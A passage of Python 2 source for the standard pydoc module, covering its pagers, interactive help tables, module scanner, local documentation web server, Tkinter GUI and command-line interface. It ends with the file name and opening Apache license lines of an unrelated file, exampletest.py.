def docother(self, object, name=None, mod=None, parent=None, maxlen=None, doc=None):
"""Produce text documentation for a data object."""
repr = self.repr(object)
if maxlen:
line = (name and name + ' = ' or '') + repr
chop = maxlen - len(line)
if chop < 0: repr = repr[:chop] + '...'
line = (name and self.bold(name) + ' = ' or '') + repr
if doc is not None:
line += '\n' + self.indent(str(doc))
return line
# --------------------------------------------------------- user interfaces
def pager(text):
"""The first time this is called, determine what kind of pager to use."""
global pager
pager = getpager()
pager(text)
def getpager():
"""Decide what method to use for paging through text."""
if type(sys.stdout) is not types.FileType:
return plainpager
if not sys.stdin.isatty() or not sys.stdout.isatty():
return plainpager
if 'PAGER' in os.environ:
if sys.platform == 'win32': # pipes completely broken in Windows
return lambda text: tempfilepager(plain(text), os.environ['PAGER'])
elif os.environ.get('TERM') in ('dumb', 'emacs'):
return lambda text: pipepager(plain(text), os.environ['PAGER'])
else:
return lambda text: pipepager(text, os.environ['PAGER'])
if os.environ.get('TERM') in ('dumb', 'emacs'):
return plainpager
if sys.platform == 'win32' or sys.platform.startswith('os2'):
return lambda text: tempfilepager(plain(text), 'more <')
if hasattr(os, 'system') and os.system('(less) 2>/dev/null') == 0:
return lambda text: pipepager(text, 'less')
import tempfile
(fd, filename) = tempfile.mkstemp()
os.close(fd)
try:
if hasattr(os, 'system') and os.system('more "%s"' % filename) == 0:
return lambda text: pipepager(text, 'more')
else:
return ttypager
finally:
os.unlink(filename)
def plain(text):
"""Remove boldface formatting from text."""
return re.sub('.\b', '', text)
def pipepager(text, cmd):
"""Page through text by feeding it to another program."""
pipe = os.popen(cmd, 'w')
try:
pipe.write(_encode(text))
pipe.close()
except IOError:
pass # Ignore broken pipes caused by quitting the pager program.
def tempfilepager(text, cmd):
"""Page through text by invoking a program on a temporary file."""
import tempfile
filename = tempfile.mktemp()
file = open(filename, 'w')
file.write(_encode(text))
file.close()
try:
os.system(cmd + ' "' + filename + '"')
finally:
os.unlink(filename)
def ttypager(text):
"""Page through text on a text terminal."""
lines = plain(_encode(plain(text), getattr(sys.stdout, 'encoding', _encoding))).split('\n')
try:
import tty
fd = sys.stdin.fileno()
old = tty.tcgetattr(fd)
tty.setcbreak(fd)
getchar = lambda: sys.stdin.read(1)
except (ImportError, AttributeError):
tty = None
getchar = lambda: sys.stdin.readline()[:-1][:1]
try:
r = inc = os.environ.get('LINES', 25) - 1
sys.stdout.write(join(lines[:inc], '\n') + '\n')
while lines[r:]:
sys.stdout.write('-- more --')
sys.stdout.flush()
c = getchar()
if c in ('q', 'Q'):
sys.stdout.write('\r \r')
break
elif c in ('\r', '\n'):
sys.stdout.write('\r \r' + lines[r] + '\n')
r = r + 1
continue
if c in ('b', 'B', '\x1b'):
r = r - inc - inc
if r < 0: r = 0
sys.stdout.write('\n' + join(lines[r:r+inc], '\n') + '\n')
r = r + inc
finally:
if tty:
tty.tcsetattr(fd, tty.TCSAFLUSH, old)
def plainpager(text):
"""Simply print unformatted text. This is the ultimate fallback."""
sys.stdout.write(_encode(plain(text), getattr(sys.stdout, 'encoding', _encoding)))
def describe(thing):
"""Produce a short description of the given thing."""
if inspect.ismodule(thing):
if thing.__name__ in sys.builtin_module_names:
return 'built-in module ' + thing.__name__
if hasattr(thing, '__path__'):
return 'package ' + thing.__name__
else:
return 'module ' + thing.__name__
if inspect.isbuiltin(thing):
return 'built-in function ' + thing.__name__
if inspect.isgetsetdescriptor(thing):
return 'getset descriptor %s.%s.%s' % (
thing.__objclass__.__module__, thing.__objclass__.__name__,
thing.__name__)
if inspect.ismemberdescriptor(thing):
return 'member descriptor %s.%s.%s' % (
thing.__objclass__.__module__, thing.__objclass__.__name__,
thing.__name__)
if inspect.isclass(thing):
return 'class ' + thing.__name__
if inspect.isfunction(thing):
return 'function ' + thing.__name__
if inspect.ismethod(thing):
return 'method ' + thing.__name__
if type(thing) is types.InstanceType:
return 'instance of ' + thing.__class__.__name__
return type(thing).__name__
def locate(path, forceload=0):
"""Locate an object by name or dotted path, importing as necessary."""
parts = [part for part in split(path, '.') if part]
module, n = None, 0
while n < len(parts):
nextmodule = safeimport(join(parts[:n+1], '.'), forceload)
if nextmodule: module, n = nextmodule, n + 1
else: break
if module:
object = module
else:
object = __builtin__
for part in parts[n:]:
try:
object = getattr(object, part)
except AttributeError:
return None
return object
# --------------------------------------- interactive interpreter interface
text = TextDoc()
html = HTMLDoc()
class _OldStyleClass: pass
_OLD_INSTANCE_TYPE = type(_OldStyleClass())
def resolve(thing, forceload=0):
"""Given an object or a path to an object, get the object and its name."""
if isinstance(thing, str):
object = locate(thing, forceload)
if not object:
raise ImportError, 'no Python documentation found for %r' % thing
return object, thing
else:
name = getattr(thing, '__name__', None)
return thing, name if isinstance(name, str) else None
def render_doc(thing, title='Python Library Documentation: %s', forceload=0):
"""Render text documentation, given an object or a path to an object."""
object, name = resolve(thing, forceload)
desc = describe(object)
module = inspect.getmodule(object)
if name and '.' in name:
desc += ' in ' + name[:name.rfind('.')]
elif module and module is not object:
desc += ' in module ' + module.__name__
if type(object) is _OLD_INSTANCE_TYPE:
# If the passed object is an instance of an old-style class,
# document its available methods instead of its value.
object = object.__class__
elif not (inspect.ismodule(object) or
inspect.isclass(object) or
inspect.isroutine(object) or
inspect.isgetsetdescriptor(object) or
inspect.ismemberdescriptor(object) or
isinstance(object, property)):
# If the passed object is a piece of data or an instance,
# document its available methods instead of its value.
object = type(object)
desc += ' object'
return title % desc + '\n\n' + text.document(object, name)
def doc(thing, title='Python Library Documentation: %s', forceload=0):
"""Display text documentation, given an object or a path to an object."""
try:
pager(render_doc(thing, title, forceload))
except (ImportError, ErrorDuringImport), value:
print value
def writedoc(thing, forceload=0):
"""Write HTML documentation to a file in the current directory."""
try:
object, name = resolve(thing, forceload)
page = html.page(describe(object), html.document(object, name))
file = open(name + '.html', 'w')
file.write(page)
file.close()
print 'wrote', name + '.html'
except (ImportError, ErrorDuringImport), value:
print value
def writedocs(dir, pkgpath='', done=None):
"""Write out HTML documentation for all modules in a directory tree."""
if done is None: done = {}
for importer, modname, ispkg in pkgutil.walk_packages([dir], pkgpath):
writedoc(modname)
return
class Helper:
# These dictionaries map a topic name to either an alias, or a tuple
# (label, seealso-items). The "label" is the label of the corresponding
# section in the .rst file under Doc/ and an index into the dictionary
# in pydoc_data/topics.py.
#
# CAUTION: if you change one of these dictionaries, be sure to adapt the
# list of needed labels in Doc/tools/sphinxext/pyspecific.py and
# regenerate the pydoc_data/topics.py file by running
# make pydoc-topics
# in Doc/ and copying the output file into the Lib/ directory.
keywords = {
'and': 'BOOLEAN',
'as': 'with',
'assert': ('assert', ''),
'break': ('break', 'while for'),
'class': ('class', 'CLASSES SPECIALMETHODS'),
'continue': ('continue', 'while for'),
'def': ('function', ''),
'del': ('del', 'BASICMETHODS'),
'elif': 'if',
'else': ('else', 'while for'),
'except': 'try',
'exec': ('exec', ''),
'finally': 'try',
'for': ('for', 'break continue while'),
'from': 'import',
'global': ('global', 'NAMESPACES'),
'if': ('if', 'TRUTHVALUE'),
'import': ('import', 'MODULES'),
'in': ('in', 'SEQUENCEMETHODS2'),
'is': 'COMPARISON',
'lambda': ('lambda', 'FUNCTIONS'),
'not': 'BOOLEAN',
'or': 'BOOLEAN',
'pass': ('pass', ''),
'print': ('print', ''),
'raise': ('raise', 'EXCEPTIONS'),
'return': ('return', 'FUNCTIONS'),
'try': ('try', 'EXCEPTIONS'),
'while': ('while', 'break continue if TRUTHVALUE'),
'with': ('with', 'CONTEXTMANAGERS EXCEPTIONS yield'),
'yield': ('yield', ''),
}
# Either add symbols to this dictionary or to the symbols dictionary
# directly: Whichever is easier. They are merged later.
_symbols_inverse = {
'STRINGS' : ("'", "'''", "r'", "u'", '"""', '"', 'r"', 'u"'),
'OPERATORS' : ('+', '-', '*', '**', '/', '//', '%', '<<', '>>', '&',
'|', '^', '~', '<', '>', '<=', '>=', '==', '!=', '<>'),
'COMPARISON' : ('<', '>', '<=', '>=', '==', '!=', '<>'),
'UNARY' : ('-', '~'),
'AUGMENTEDASSIGNMENT' : ('+=', '-=', '*=', '/=', '%=', '&=', '|=',
'^=', '<<=', '>>=', '**=', '//='),
'BITWISE' : ('<<', '>>', '&', '|', '^', '~'),
'COMPLEX' : ('j', 'J')
}
symbols = {
'%': 'OPERATORS FORMATTING',
'**': 'POWER',
',': 'TUPLES LISTS FUNCTIONS',
'.': 'ATTRIBUTES FLOAT MODULES OBJECTS',
'...': 'ELLIPSIS',
':': 'SLICINGS DICTIONARYLITERALS',
'@': 'def class',
'\\': 'STRINGS',
'_': 'PRIVATENAMES',
'__': 'PRIVATENAMES SPECIALMETHODS',
'`': 'BACKQUOTES',
'(': 'TUPLES FUNCTIONS CALLS',
')': 'TUPLES FUNCTIONS CALLS',
'[': 'LISTS SUBSCRIPTS SLICINGS',
']': 'LISTS SUBSCRIPTS SLICINGS'
}
for topic, symbols_ in _symbols_inverse.iteritems():
for symbol in symbols_:
topics = symbols.get(symbol, topic)
if topic not in topics:
topics = topics + ' ' + topic
symbols[symbol] = topics
topics = {
'TYPES': ('types', 'STRINGS UNICODE NUMBERS SEQUENCES MAPPINGS '
'FUNCTIONS CLASSES MODULES FILES inspect'),
'STRINGS': ('strings', 'str UNICODE SEQUENCES STRINGMETHODS FORMATTING '
'TYPES'),
'STRINGMETHODS': ('string-methods', 'STRINGS FORMATTING'),
'FORMATTING': ('formatstrings', 'OPERATORS'),
'UNICODE': ('strings', 'encodings unicode SEQUENCES STRINGMETHODS '
'FORMATTING TYPES'),
'NUMBERS': ('numbers', 'INTEGER FLOAT COMPLEX TYPES'),
'INTEGER': ('integers', 'int range'),
'FLOAT': ('floating', 'float math'),
'COMPLEX': ('imaginary', 'complex cmath'),
'SEQUENCES': ('typesseq', 'STRINGMETHODS FORMATTING xrange LISTS'),
'MAPPINGS': 'DICTIONARIES',
'FUNCTIONS': ('typesfunctions', 'def TYPES'),
'METHODS': ('typesmethods', 'class def CLASSES TYPES'),
'CODEOBJECTS': ('bltin-code-objects', 'compile FUNCTIONS TYPES'),
'TYPEOBJECTS': ('bltin-type-objects', 'types TYPES'),
'FRAMEOBJECTS': 'TYPES',
'TRACEBACKS': 'TYPES',
'NONE': ('bltin-null-object', ''),
'ELLIPSIS': ('bltin-ellipsis-object', 'SLICINGS'),
'FILES': ('bltin-file-objects', ''),
'SPECIALATTRIBUTES': ('specialattrs', ''),
'CLASSES': ('types', 'class SPECIALMETHODS PRIVATENAMES'),
'MODULES': ('typesmodules', 'import'),
'PACKAGES': 'import',
'EXPRESSIONS': ('operator-summary', 'lambda or and not in is BOOLEAN '
'COMPARISON BITWISE SHIFTING BINARY FORMATTING POWER '
'UNARY ATTRIBUTES SUBSCRIPTS SLICINGS CALLS TUPLES '
'LISTS DICTIONARIES BACKQUOTES'),
'OPERATORS': 'EXPRESSIONS',
'PRECEDENCE': 'EXPRESSIONS',
'OBJECTS': ('objects', 'TYPES'),
'SPECIALMETHODS': ('specialnames', 'BASICMETHODS ATTRIBUTEMETHODS '
'CALLABLEMETHODS SEQUENCEMETHODS1 MAPPINGMETHODS '
'SEQUENCEMETHODS2 NUMBERMETHODS CLASSES'),
'BASICMETHODS': ('customization', 'cmp hash repr str SPECIALMETHODS'),
'ATTRIBUTEMETHODS': ('attribute-access', 'ATTRIBUTES SPECIALMETHODS'),
'CALLABLEMETHODS': ('callable-types', 'CALLS SPECIALMETHODS'),
'SEQUENCEMETHODS1': ('sequence-types', 'SEQUENCES SEQUENCEMETHODS2 '
'SPECIALMETHODS'),
'SEQUENCEMETHODS2': ('sequence-methods', 'SEQUENCES SEQUENCEMETHODS1 '
'SPECIALMETHODS'),
'MAPPINGMETHODS': ('sequence-types', 'MAPPINGS SPECIALMETHODS'),
'NUMBERMETHODS': ('numeric-types', 'NUMBERS AUGMENTEDASSIGNMENT '
'SPECIALMETHODS'),
'EXECUTION': ('execmodel', 'NAMESPACES DYNAMICFEATURES EXCEPTIONS'),
'NAMESPACES': ('naming', 'global ASSIGNMENT DELETION DYNAMICFEATURES'),
'DYNAMICFEATURES': ('dynamic-features', ''),
'SCOPING': 'NAMESPACES',
'FRAMES': 'NAMESPACES',
'EXCEPTIONS': ('exceptions', 'try except finally raise'),
'COERCIONS': ('coercion-rules','CONVERSIONS'),
'CONVERSIONS': ('conversions', 'COERCIONS'),
'IDENTIFIERS': ('identifiers', 'keywords SPECIALIDENTIFIERS'),
'SPECIALIDENTIFIERS': ('id-classes', ''),
'PRIVATENAMES': ('atom-identifiers', ''),
'LITERALS': ('atom-literals', 'STRINGS BACKQUOTES NUMBERS '
'TUPLELITERALS LISTLITERALS DICTIONARYLITERALS'),
'TUPLES': 'SEQUENCES',
'TUPLELITERALS': ('exprlists', 'TUPLES LITERALS'),
'LISTS': ('typesseq-mutable', 'LISTLITERALS'),
'LISTLITERALS': ('lists', 'LISTS LITERALS'),
'DICTIONARIES': ('typesmapping', 'DICTIONARYLITERALS'),
'DICTIONARYLITERALS': ('dict', 'DICTIONARIES LITERALS'),
'BACKQUOTES': ('string-conversions', 'repr str STRINGS LITERALS'),
'ATTRIBUTES': ('attribute-references', 'getattr hasattr setattr '
'ATTRIBUTEMETHODS'),
'SUBSCRIPTS': ('subscriptions', 'SEQUENCEMETHODS1'),
'SLICINGS': ('slicings', 'SEQUENCEMETHODS2'),
'CALLS': ('calls', 'EXPRESSIONS'),
'POWER': ('power', 'EXPRESSIONS'),
'UNARY': ('unary', 'EXPRESSIONS'),
'BINARY': ('binary', 'EXPRESSIONS'),
'SHIFTING': ('shifting', 'EXPRESSIONS'),
'BITWISE': ('bitwise', 'EXPRESSIONS'),
'COMPARISON': ('comparisons', 'EXPRESSIONS BASICMETHODS'),
'BOOLEAN': ('booleans', 'EXPRESSIONS TRUTHVALUE'),
'ASSERTION': 'assert',
'ASSIGNMENT': ('assignment', 'AUGMENTEDASSIGNMENT'),
'AUGMENTEDASSIGNMENT': ('augassign', 'NUMBERMETHODS'),
'DELETION': 'del',
'PRINTING': 'print',
'RETURNING': 'return',
'IMPORTING': 'import',
'CONDITIONAL': 'if',
'LOOPING': ('compound', 'for while break continue'),
'TRUTHVALUE': ('truth', 'if while and or not BASICMETHODS'),
'DEBUGGING': ('debugger', 'pdb'),
'CONTEXTMANAGERS': ('context-managers', 'with'),
}
def __init__(self, input=None, output=None):
self._input = input
self._output = output
input = property(lambda self: self._input or sys.stdin)
output = property(lambda self: self._output or sys.stdout)
def __repr__(self):
if inspect.stack()[1][3] == '?':
self()
return ''
return '<pydoc.Helper instance>'
_GoInteractive = object()
def __call__(self, request=_GoInteractive):
if request is not self._GoInteractive:
self.help(request)
else:
self.intro()
self.interact()
self.output.write('''
You are now leaving help and returning to the Python interpreter.
If you want to ask for help on a particular object directly from the
interpreter, you can type "help(object)". Executing "help('string')"
has the same effect as typing a particular string at the help> prompt.
''')
def interact(self):
self.output.write('\n')
while True:
try:
request = self.getline('help> ')
if not request: break
except (KeyboardInterrupt, EOFError):
break
request = strip(replace(request, '"', '', "'", ''))
if lower(request) in ('q', 'quit'): break
self.help(request)
def getline(self, prompt):
"""Read one line, using raw_input when available."""
if self.input is sys.stdin:
return raw_input(prompt)
else:
self.output.write(prompt)
self.output.flush()
return self.input.readline()
def help(self, request):
if type(request) is type(''):
request = request.strip()
if request == 'help': self.intro()
elif request == 'keywords': self.listkeywords()
elif request == 'symbols': self.listsymbols()
elif request == 'topics': self.listtopics()
elif request == 'modules': self.listmodules()
elif request[:8] == 'modules ':
self.listmodules(split(request)[1])
elif request in self.symbols: self.showsymbol(request)
elif request in self.keywords: self.showtopic(request)
elif request in self.topics: self.showtopic(request)
elif request: doc(request, 'Help on %s:')
elif isinstance(request, Helper): self()
else: doc(request, 'Help on %s:')
self.output.write('\n')
def intro(self):
self.output.write('''
Welcome to Python %s! This is the online help utility.
If this is your first time using Python, you should definitely check out
the tutorial on the Internet at http://docs.python.org/%s/tutorial/.
Enter the name of any module, keyword, or topic to get help on writing
Python programs and using Python modules. To quit this help utility and
return to the interpreter, just type "quit".
To get a list of available modules, keywords, or topics, type "modules",
"keywords", or "topics". Each module also comes with a one-line summary
of what it does; to list the modules whose summaries contain a given word
such as "spam", type "modules spam".
''' % tuple([sys.version[:3]]*2))
def list(self, items, columns=4, width=80):
items = items[:]
items.sort()
colw = width / columns
rows = (len(items) + columns - 1) / columns
for row in range(rows):
for col in range(columns):
i = col * rows + row
if i < len(items):
self.output.write(items[i])
if col < columns - 1:
self.output.write(' ' + ' ' * (colw-1 - len(items[i])))
self.output.write('\n')
def listkeywords(self):
self.output.write('''
Here is a list of the Python keywords. Enter any keyword to get more help.
''')
self.list(self.keywords.keys())
def listsymbols(self):
self.output.write('''
Here is a list of the punctuation symbols which Python assigns special meaning
to. Enter any symbol to get more help.
''')
self.list(self.symbols.keys())
def listtopics(self):
self.output.write('''
Here is a list of available topics. Enter any topic name to get more help.
''')
self.list(self.topics.keys())
def showtopic(self, topic, more_xrefs=''):
try:
import pydoc_data.topics
except ImportError:
self.output.write('''
Sorry, topic and keyword documentation is not available because the
module "pydoc_data.topics" could not be found.
''')
return
target = self.topics.get(topic, self.keywords.get(topic))
if not target:
self.output.write('no documentation found for %s\n' % repr(topic))
return
if type(target) is type(''):
return self.showtopic(target, more_xrefs)
label, xrefs = target
try:
doc = pydoc_data.topics.topics[label]
except KeyError:
self.output.write('no documentation found for %s\n' % repr(topic))
return
pager(strip(doc) + '\n')
if more_xrefs:
xrefs = (xrefs or '') + ' ' + more_xrefs
if xrefs:
import StringIO, formatter
buffer = StringIO.StringIO()
formatter.DumbWriter(buffer).send_flowing_data(
'Related help topics: ' + join(split(xrefs), ', ') + '\n')
self.output.write('\n%s\n' % buffer.getvalue())
def showsymbol(self, symbol):
target = self.symbols[symbol]
topic, _, xrefs = target.partition(' ')
self.showtopic(topic, xrefs)
def listmodules(self, key=''):
if key:
self.output.write('''
Here is a list of matching modules. Enter any module name to get more help.
''')
apropos(key)
else:
self.output.write('''
Please wait a moment while I gather a list of all available modules...
''')
modules = {}
def callback(path, modname, desc, modules=modules):
if modname and modname[-9:] == '.__init__':
modname = modname[:-9] + ' (package)'
if find(modname, '.') < 0:
modules[modname] = 1
def onerror(modname):
callback(None, modname, None)
ModuleScanner().run(callback, onerror=onerror)
self.list(modules.keys())
self.output.write('''
Enter any module name to get more help. Or, type "modules spam" to search
for modules whose descriptions contain the word "spam".
''')
help = Helper()
class Scanner:
"""A generic tree iterator."""
def __init__(self, roots, children, descendp):
self.roots = roots[:]
self.state = []
self.children = children
self.descendp = descendp
def next(self):
if not self.state:
if not self.roots:
return None
root = self.roots.pop(0)
self.state = [(root, self.children(root))]
node, children = self.state[-1]
if not children:
self.state.pop()
return self.next()
child = children.pop(0)
if self.descendp(child):
self.state.append((child, self.children(child)))
return child
class ModuleScanner:
"""An interruptible scanner that searches module synopses."""
def run(self, callback, key=None, completer=None, onerror=None):
if key: key = lower(key)
self.quit = False
seen = {}
for modname in sys.builtin_module_names:
if modname != '__main__':
seen[modname] = 1
if key is None:
callback(None, modname, '')
else:
desc = split(__import__(modname).__doc__ or '', '\n')[0]
if find(lower(modname + ' - ' + desc), key) >= 0:
callback(None, modname, desc)
for importer, modname, ispkg in pkgutil.walk_packages(onerror=onerror):
if self.quit:
break
if key is None:
callback(None, modname, '')
else:
loader = importer.find_module(modname)
if hasattr(loader,'get_source'):
import StringIO
desc = source_synopsis(
StringIO.StringIO(loader.get_source(modname))
) or ''
if hasattr(loader,'get_filename'):
path = loader.get_filename(modname)
else:
path = None
else:
module = loader.load_module(modname)
desc = (module.__doc__ or '').splitlines()[0]
path = getattr(module,'__file__',None)
if find(lower(modname + ' - ' + desc), key) >= 0:
callback(path, modname, desc)
if completer:
completer()
def apropos(key):
"""Print all the one-line module summaries that contain a substring."""
def callback(path, modname, desc):
if modname[-9:] == '.__init__':
modname = modname[:-9] + ' (package)'
print modname, desc and '- ' + desc
def onerror(modname):
pass
with warnings.catch_warnings():
warnings.filterwarnings('ignore') # ignore problems during import
ModuleScanner().run(callback, key, onerror=onerror)
# --------------------------------------------------- web browser interface
def serve(port, callback=None, completer=None):
import BaseHTTPServer, mimetools, select
# Patch up mimetools.Message so it doesn't break if rfc822 is reloaded.
class Message(mimetools.Message):
def __init__(self, fp, seekable=1):
Message = self.__class__
Message.__bases__[0].__bases__[0].__init__(self, fp, seekable)
self.encodingheader = self.getheader('content-transfer-encoding')
self.typeheader = self.getheader('content-type')
self.parsetype()
self.parseplist()
class DocHandler(BaseHTTPServer.BaseHTTPRequestHandler):
def send_document(self, title, contents):
try:
self.send_response(200)
self.send_header('Content-Type', 'text/html')
self.end_headers()
self.wfile.write(html.page(title, contents))
except IOError: pass
def do_GET(self):
path = self.path
if path[-5:] == '.html': path = path[:-5]
if path[:1] == '/': path = path[1:]
if path and path != '.':
try:
obj = locate(path, forceload=1)
except ErrorDuringImport, value:
self.send_document(path, html.escape(str(value)))
return
if obj:
self.send_document(describe(obj), html.document(obj, path))
else:
self.send_document(path,
'no Python documentation found for %s' % repr(path))
else:
heading = html.heading(
'<big><big><strong>Python: Index of Modules</strong></big></big>',
'#ffffff', '#7799ee')
def bltinlink(name):
return '<a href="%s.html">%s</a>' % (name, name)
names = filter(lambda x: x != '__main__',
sys.builtin_module_names)
contents = html.multicolumn(names, bltinlink)
indices = ['<p>' + html.bigsection(
'Built-in Modules', '#ffffff', '#ee77aa', contents)]
seen = {}
for dir in sys.path:
indices.append(html.index(dir, seen))
contents = heading + join(indices) + '''<p align=right>
<font color="#909090" face="helvetica, arial"><strong>
pydoc</strong> by Ka-Ping Yee <ping@lfw.org></font>'''
self.send_document('Index of Modules', contents)
def log_message(self, *args): pass
class DocServer(BaseHTTPServer.HTTPServer):
def __init__(self, port, callback):
host = 'localhost'
self.address = (host, port)
self.url = 'http://%s:%d/' % (host, port)
self.callback = callback
self.base.__init__(self, self.address, self.handler)
def serve_until_quit(self):
import select
self.quit = False
while not self.quit:
rd, wr, ex = select.select([self.socket.fileno()], [], [], 1)
if rd: self.handle_request()
def server_activate(self):
self.base.server_activate(self)
if self.callback: self.callback(self)
DocServer.base = BaseHTTPServer.HTTPServer
DocServer.handler = DocHandler
DocHandler.MessageClass = Message
try:
try:
DocServer(port, callback).serve_until_quit()
except (KeyboardInterrupt, select.error):
pass
finally:
if completer: completer()
# ----------------------------------------------------- graphical interface
def gui():
"""Graphical interface (starts web server and pops up a control window)."""
class GUI:
def __init__(self, window, port=7464):
self.window = window
self.server = None
self.scanner = None
import Tkinter
self.server_frm = Tkinter.Frame(window)
self.title_lbl = Tkinter.Label(self.server_frm,
text='Starting server...\n ')
self.open_btn = Tkinter.Button(self.server_frm,
text='open browser', command=self.open, state='disabled')
self.quit_btn = Tkinter.Button(self.server_frm,
text='quit serving', command=self.quit, state='disabled')
self.search_frm = Tkinter.Frame(window)
self.search_lbl = Tkinter.Label(self.search_frm, text='Search for')
self.search_ent = Tkinter.Entry(self.search_frm)
self.search_ent.bind('<Return>', self.search)
self.stop_btn = Tkinter.Button(self.search_frm,
text='stop', pady=0, command=self.stop, state='disabled')
if sys.platform == 'win32':
# Trying to hide and show this button crashes under Windows.
self.stop_btn.pack(side='right')
self.window.title('pydoc')
self.window.protocol('WM_DELETE_WINDOW', self.quit)
self.title_lbl.pack(side='top', fill='x')
self.open_btn.pack(side='left', fill='x', expand=1)
self.quit_btn.pack(side='right', fill='x', expand=1)
self.server_frm.pack(side='top', fill='x')
self.search_lbl.pack(side='left')
self.search_ent.pack(side='right', fill='x', expand=1)
self.search_frm.pack(side='top', fill='x')
self.search_ent.focus_set()
font = ('helvetica', sys.platform == 'win32' and 8 or 10)
self.result_lst = Tkinter.Listbox(window, font=font, height=6)
self.result_lst.bind('<Button-1>', self.select)
self.result_lst.bind('<Double-Button-1>', self.goto)
self.result_scr = Tkinter.Scrollbar(window,
orient='vertical', command=self.result_lst.yview)
self.result_lst.config(yscrollcommand=self.result_scr.set)
self.result_frm = Tkinter.Frame(window)
self.goto_btn = Tkinter.Button(self.result_frm,
text='go to selected', command=self.goto)
self.hide_btn = Tkinter.Button(self.result_frm,
text='hide results', command=self.hide)
self.goto_btn.pack(side='left', fill='x', expand=1)
self.hide_btn.pack(side='right', fill='x', expand=1)
self.window.update()
self.minwidth = self.window.winfo_width()
self.minheight = self.window.winfo_height()
self.bigminheight = (self.server_frm.winfo_reqheight() +
self.search_frm.winfo_reqheight() +
self.result_lst.winfo_reqheight() +
self.result_frm.winfo_reqheight())
self.bigwidth, self.bigheight = self.minwidth, self.bigminheight
self.expanded = 0
self.window.wm_geometry('%dx%d' % (self.minwidth, self.minheight))
self.window.wm_minsize(self.minwidth, self.minheight)
self.window.tk.willdispatch()
import threading
threading.Thread(
target=serve, args=(port, self.ready, self.quit)).start()
def ready(self, server):
self.server = server
self.title_lbl.config(
text='Python documentation server at\n' + server.url)
self.open_btn.config(state='normal')
self.quit_btn.config(state='normal')
def open(self, event=None, url=None):
url = url or self.server.url
try:
import webbrowser
webbrowser.open(url)
except ImportError: # pre-webbrowser.py compatibility
if sys.platform == 'win32':
os.system('start "%s"' % url)
else:
rc = os.system('netscape -remote "openURL(%s)" &' % url)
if rc: os.system('netscape "%s" &' % url)
def quit(self, event=None):
if self.server:
self.server.quit = 1
self.window.quit()
def search(self, event=None):
key = self.search_ent.get()
self.stop_btn.pack(side='right')
self.stop_btn.config(state='normal')
self.search_lbl.config(text='Searching for "%s"...' % key)
self.search_ent.forget()
self.search_lbl.pack(side='left')
self.result_lst.delete(0, 'end')
self.goto_btn.config(state='disabled')
self.expand()
import threading
if self.scanner:
self.scanner.quit = 1
self.scanner = ModuleScanner()
threading.Thread(target=self.scanner.run,
args=(self.update, key, self.done)).start()
def update(self, path, modname, desc):
if modname[-9:] == '.__init__':
modname = modname[:-9] + ' (package)'
self.result_lst.insert('end',
modname + ' - ' + (desc or '(no description)'))
def stop(self, event=None):
if self.scanner:
self.scanner.quit = 1
self.scanner = None
def done(self):
self.scanner = None
self.search_lbl.config(text='Search for')
self.search_lbl.pack(side='left')
self.search_ent.pack(side='right', fill='x', expand=1)
if sys.platform != 'win32': self.stop_btn.forget()
self.stop_btn.config(state='disabled')
def select(self, event=None):
self.goto_btn.config(state='normal')
def goto(self, event=None):
selection = self.result_lst.curselection()
if selection:
modname = split(self.result_lst.get(selection[0]))[0]
self.open(url=self.server.url + modname + '.html')
def collapse(self):
if not self.expanded: return
self.result_frm.forget()
self.result_scr.forget()
self.result_lst.forget()
self.bigwidth = self.window.winfo_width()
self.bigheight = self.window.winfo_height()
self.window.wm_geometry('%dx%d' % (self.minwidth, self.minheight))
self.window.wm_minsize(self.minwidth, self.minheight)
self.expanded = 0
def expand(self):
if self.expanded: return
self.result_frm.pack(side='bottom', fill='x')
self.result_scr.pack(side='right', fill='y')
self.result_lst.pack(side='top', fill='both', expand=1)
self.window.wm_geometry('%dx%d' % (self.bigwidth, self.bigheight))
self.window.wm_minsize(self.minwidth, self.bigminheight)
self.expanded = 1
def hide(self, event=None):
self.stop()
self.collapse()
import Tkinter
try:
root = Tkinter.Tk()
# Tk will crash if pythonw.exe has an XP .manifest
# file and the root has is not destroyed explicitly.
# If the problem is ever fixed in Tk, the explicit
# destroy can go.
try:
gui = GUI(root)
root.mainloop()
finally:
root.destroy()
except KeyboardInterrupt:
pass
# -------------------------------------------------- command-line interface
def ispath(x):
return isinstance(x, str) and find(x, os.sep) >= 0
def cli():
"""Command-line interface (looks at sys.argv to decide what to do)."""
import getopt
class BadUsage: pass
# Scripts don't get the current directory in their path by default
# unless they are run with the '-m' switch
if '' not in sys.path:
scriptdir = os.path.dirname(sys.argv[0])
if scriptdir in sys.path:
sys.path.remove(scriptdir)
sys.path.insert(0, '.')
try:
opts, args = getopt.getopt(sys.argv[1:], 'gk:p:w')
writing = 0
for opt, val in opts:
if opt == '-g':
gui()
return
if opt == '-k':
apropos(val)
return
if opt == '-p':
try:
port = int(val)
except ValueError:
raise BadUsage
def ready(server):
print 'pydoc server ready at %s' % server.url
def stopped():
print 'pydoc server stopped'
serve(port, ready, stopped)
return
if opt == '-w':
writing = 1
if not args: raise BadUsage
for arg in args:
if ispath(arg) and not os.path.exists(arg):
print 'file %r does not exist' % arg
break
try:
if ispath(arg) and os.path.isfile(arg):
arg = importfile(arg)
if writing:
if ispath(arg) and os.path.isdir(arg):
writedocs(arg)
else:
writedoc(arg)
else:
help.help(arg)
except ErrorDuringImport, value:
print value
except (getopt.error, BadUsage):
cmd = os.path.basename(sys.argv[0])
print """pydoc - the Python documentation tool
%s <name> ...
Show text documentation on something. <name> may be the name of a
Python keyword, topic, function, module, or package, or a dotted
reference to a class or function within a module or module in a
package. If <name> contains a '%s', it is used as the path to a
Python source file to document. If name is 'keywords', 'topics',
or 'modules', a listing of these things is displayed.
%s -k <keyword>
Search for a keyword in the synopsis lines of all available modules.
%s -p <port>
Start an HTTP server on the given port on the local machine.
%s -g
Pop up a graphical interface for finding and serving documentation.
%s -w <name> ...
Write out the HTML documentation for a module to a file in the current
directory. If <name> contains a '%s', it is treated as a filename; if
it names a directory, documentation is written for all the contents.
""" % (cmd, os.sep, cmd, cmd, cmd, cmd, os.sep)
if __name__ == '__main__': cli()
|
exampletest.py
|
#
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
